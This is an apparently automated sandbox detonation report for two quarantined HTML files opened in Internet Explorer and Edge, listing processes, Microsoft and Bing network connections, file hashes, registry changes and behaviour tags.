"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,17724223371327103080,7946097842118393036,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2628 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 104.115.34.42:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA1 c216daa71094da3ffa15c787c41b0bc7b32ed40b
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855
SHA512 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

\??\pipe\LOCAL\crashpad_1664_UQHTBNDPYRKPYDOB

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA1 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25
SHA512 7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6f90d496fa3f70e6c6c0c3c526ad9b2b
SHA1 32bcf9fd3a2ca6db9b8b587133d3f16bf3876cb3
SHA256 ed0ea677ec11a5afdf86641bb3017fc99e96d7158d30102178b5f97a3a568d39
SHA512 cb1870cc4f2bf207bc4dfc1dc1bf5d610e545c6a95ed5a8484aef6ce575e64a7197d92bf57538ac68a1bbd7ff130e916dfe597658b1d89b43dd1e1475d8a2ceb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d7b1e4b5b5bca3c94d7ab213b4999d89
SHA1 f86c5ab0bf9cd5914a7395733066731b6b81ea88
SHA256 8b25d0ae5880534ba1c02d3d2b1e8c67036049989be187ef5e7c3fd382096333
SHA512 6f45872c8beca9c4055ccd2e4014f382b5342c4f67c4ce81248cae1ba008312f0c2dbf61139a5996cd7057cca0e1da5028c1e9a802e608edcdded7515dca51a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3f6ec9b87ec91a0beb3646fa15ae9757
SHA1 88d241c27df8d15b65910b48f58baa2a979d9168
SHA256 2eb1e2aa1072a3228b63aa21cec787769ab1b0b0d5d1d0b7f9021d07afdb3b0f
SHA512 0597285e189c1f800c35000d0c8973cd2433f47a4c2500797893e066bc730cbd0bced52d2f449fd7d5ec09b254d6137dd4cc833b76962f94b8d368a1c87bda81

Analysis: behavioral18

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

117s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c01a77a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000500ec1bad367ae4b9a7b7ef006acb24f0000000002000000000010660000000100002000000029f2d9948d998697d9e0b74acdf52009f6bb037f9cce3039a0580902469dc730000000000e8000000002000020000000d0dc09fdc8344193bf2bb0d6fb37e7aeec423041169ea85f66a607fc5fd8b33f2000000068eed23f5015d4ec9bc4ec1c235ed49b36dbe643308398dfb53ea2812549108840000000c27f205c09b23cc7cf372198d90f0f4a13fa9930cbd941d480a3a10c4c6856ae26e141b07b87456d38f248ddb10f39af40a237d3a8736be535ca82206d92c216 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D50EF451-F49B-11EF-B20A-C60424AAF5E1} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000500ec1bad367ae4b9a7b7ef006acb24f0000000002000000000010660000000100002000000086b341fe53aa19f9aadd0ad944f6939aeaf6b4a10bda3aae7a850af71b7ccc7e000000000e8000000002000020000000a881d4c76563e6c940f88ac752e009f8d2be070a42f429f8b77284d7b405395390000000a97a81c6a19df8088e9fafddf002ad861d822d87df4f39a3b09ae9015601b3a1ffff847c36e8a51a64b904d9a99ca6efbcc5ed3f0a87723bc5b866e0e51f9783e2e958cf22483b77a3a4a57e352712f6bb7e7523d8a74fa8a74140d15ae60b89070b3e005c04d72b5d33025d3eb41dc85aa9ed4aaf5f34275e7de53f35558ac8636035f9f68c3661a9ead2767acc708840000000ced7d7768186e02b9cfcb5105552aeda8b4972d5cbe48936d634916831d46af9c9bcb497c9bbc4821651a14507b8816e366fff7c0e01aa3d95e9d53885e6ddc0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabE1F9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b8cd7e03e6e492ad4b97bfcaec653574
SHA1 1c17ea7acc2f0ad3a4e81dbfc7373a60614f1ef8
SHA256 20ccdae7b3ad0f10f38d64871657ee1962ba0f5818e153136c80567a15949880
SHA512 fd5f17b219a0c43d579d043fddf123ccf28f79dc3cd710b289656cfda0f99c91855a373bbc528cbf4b86d8aa51a145ab35427d0cb4626d3d30c7855e20cb8c29

C:\Users\Admin\AppData\Local\Temp\TarE27D.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0447ce5bdcb812127067fc58f7d3532c
SHA1 8330c53f6fdffb1acf7e32f6084ae904b5aeaa6b
SHA256 cee3a1bab51154845648e8b8c929a64e2cc64fb5fe5bc0391cd7e1ce940ee5e4
SHA512 9e92ba994e6828deeb69be46e48ee89f40e3f2158420303d74c9bc619cd81d8ecc16f5284ed01aba01b4778a0830a3223798d86477943ad3cb0511016831bc2b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 29b957c46301837ab7548e4125ce53cb
SHA1 ace16cf7530741c7defecb631c959881948a7ef2
SHA256 8570d8940d55009a4bc4248eb2ca2cc9928a7e1225436963b87c3d677ca22988
SHA512 94dc36c8272ce7be638f3bc36433a8c408b0367e091f95fb6482ca6fb768964580f2922cf3880804a9f3f542a5f67dbae8f73020906996745bc06a3014c4e8c4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 95b20313de903eaff86df75136008f17
SHA1 47c62488636d5efeb8c74dbffe95c71e8f29c6ad
SHA256 53c31db7b9d53a3efecf19c125160af3aebd981ec24e52d20219c145a218f666
SHA512 06ce432e31e569407bd6f0d1b0caa96a79643fbda9442691cd3b7997ff7ecdcb833325fe30ad97d3d2d28160deac3c563259263836d09077fa049b89ecefca31

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ae6ed0ef86ef5c94fad4b7ec351b8f19
SHA1 74fe5d77d19daf11d6aa59ecc53f9cee140ff520
SHA256 b421259f6b42fbe0337ca68e23063dc2927f09f11529a8731e9876ff6cf9fa65
SHA512 a541ec8a353e98c3846877dbc0e2d160e9a9e31b6016d38418bee0e6785b9b2cca2418b0bdb375bfc92964c04d36756a7b9030ae8b5499c3be2c538e07beaeb0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 28df825102dae1f03f3feb2199ed4e7a
SHA1 d606b4ef43f758dadba0d2f7af70a1880915e7b2
SHA256 f7ec8af0dc77f2e31c389634f34c6dc166940c2105f194cca3f321e991df3f2b
SHA512 4c1a8320cb713effc8aae764d8ae51dfdf7a24758b36180d1a11c6b318e8a07dbf8d4626fb7b506124dcaa93cd0cef485ea3ea518505a195bdb7a87c44be2bd1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 83d54c3a315782169864a6fb24f88bbb
SHA1 39d95571cacee4016d5d0b2fba31f5e20879aa33
SHA256 77bdc17624f8e68c7f104852e52242f90a5526be008043395af2f3eefdc7de77
SHA512 5cf0fc06aedcde160b0dd488c153075de56137be8967ee5ab730ad62b4e21e9a076231906b157a0aed567b36188bc2d660efa13481867b58eaccda3e1d4c0f81

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 be8e1d132880bb38ed26ffba3f299e75
SHA1 d5b5c1ef9eaafc83f722b3bf48b731ad1dbd6925
SHA256 97e316c3497668f869d745ad72855f225effa3731e4f842dc2fea764df176903
SHA512 6ed0313cd55f73b357bc95fc6edb48044f02e43888cc4ba8ead55b7ed112a6aca56c86ece1d9e4537cd6d9d244d7d0fe7cb81c6d116f3151fad0557bec9efc91

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fefb754143d7805d020e3dadb41a4e95
SHA1 e8127e429e92da08fedc7054b41c006c2cf59913
SHA256 14e0260a99963cd9f0844cb4728b74cc3e4372a0ef3e9f25a02343a31246b256
SHA512 e678ac4d31283a06838975bb0ea80ec4b2cec79c434ad054fe687466ee4519160dc98556f33b179877c1d60a23417e64d4e74509a698afb2da8f50b6d681345d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b06f911ffe494e341f10ed3d4489841b
SHA1 e99a69fe49eec3d9b03e348e67ce260f3bea46af
SHA256 25a9e1a5ca7548c9f3eebda500b55224cbffd907ed1962485ab7a87e813da956
SHA512 78547ea48e305f672567a4420f4cb086df72f63277357658361cb802523376a47a7248da1c38e552910e56a7e7133d53d3bc1b14a76dbd1074d37ad6b865b5c6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 54620e16beadc9c29a9ab4871594cc3d
SHA1 755f0d5d38b8a044d9b4aa2f311588a340328b96
SHA256 9c2b500634a86135bc4db574561a1c98e0310e18dc3c4b8a01eff5e77b973345
SHA512 3b60e3e81061e46617f90e9bb63cfdbd1ec990490583d661419aea825f9515b9eaf690fa5f08dfd53bfad10fc5ff06330293e0142a2b0b9a7d556c264f821b57

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 cfd20556b8e5dff86330c8e2868340ff
SHA1 0efcbbeff64d62405e9730e598ad1541aad593e9
SHA256 08e85cebb1a74b93cbb2b55cfd60fb5853c601599589bd0186cf77c1b22e33b4
SHA512 175b3a882bd75ef17c30e29f8f84a24e9c0e1840719ef21b954545d5bda0d217b85773be6e92de83dd46089a1bb1b32e3946cfefd7b9dbacd558c93fed10371f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 46449cdde03bf68ecb44202d327e3dfe
SHA1 45e122259ba5e42363af99d56490995ad5976aa2
SHA256 248fbff47e64fb092d1400e3869be3292f7f1e8070d99beec7704bc8189e3538
SHA512 e0e7f3471bfbbde2b8fc578af011fdc3fcab5264a4a0db09573455fd9963920c1b5dde2ca81e52936f683f99f157b8854789025c58ca26bc0cc6c7f716cbb9bf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38ffe10d22be1b9075f550363b59b94d
SHA1 c569c24df47e3e0db28e78d81186a84de8b44cb3
SHA256 e8c8f960d7cee2cc49f6d9b495d36d93f33accf6fa848cbc15331339f6c47841
SHA512 f22db6c4829df4febca0251754d0926dc8231bfa7fbe502d5993a02bb2c2efd631a4b8899e416ca6ffbba3562558f4a6783fa365ff48febe2e5db1ddfbd0e174

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 47b91d6ebd77779fa86be0f3339f9d09
SHA1 9700b9fbb9a8caeb57e219ec95bca9e4f4b8b1be
SHA256 8852c31741b5a148c9bea2a65b21a53267c8e5965fb6d05b2d2af63c3ab92a64
SHA512 14048142f6c683cc07c0811d6730f7cff08a95cf2a4a7de2719cc8a756e83fecb8b38103657240ca1900b999277773a4cd5896ae483424dfb29adb725f2651b2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3fb60ec04795e31ce3f26578f3942195
SHA1 1b5e57c1faf4f73c5203b560b2be5798eeda89d8
SHA256 e779945270ed20104abec2ea384fa0238fdd858ed06962d02dfa4105d6e48c2e
SHA512 0ddf6bb63481d6203c98290957a8dc6a99c4f967f9a9300b0e7a304524762604b23a245c4dbc7489ced2221254cfae67ed07fe46273df0ce757b8f762edb3a6b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f999912e11fc1233f6a059f7b5c8597f
SHA1 58fe782ac29645e426403159d68c7c74eca3ce9f
SHA256 e7c34c2cce25930e9a3a9b0f352d707773533c23ddd8783c12eff5a067e1287f
SHA512 c03c83b1bdd659f5c9a9e86756b6386f2e69f32ade717716d33c5c6be773b119fd3e64bd77ba5cbd5dbce28a2ff6e29a8f7bbd60f6aabe617be3e4efcd40f001

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 11b4925e1a3959995ad5bd7cc3ec02e0
SHA1 31494817b6459966b61b146e9d43497e29a02e94
SHA256 c4b702b7528ff9a647296a0a1fbac6d4e902b9f5372f816850050ff1a52d46c9
SHA512 8900bb59b005becb699d23f0b71e5acb7eb37d63693b92963879c49ceeeb533a8094e4b35f0b83e05ac9f9d74ee5516b19a055d88c5d1d12f67ce09d8c9ad322

Analysis: behavioral28

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
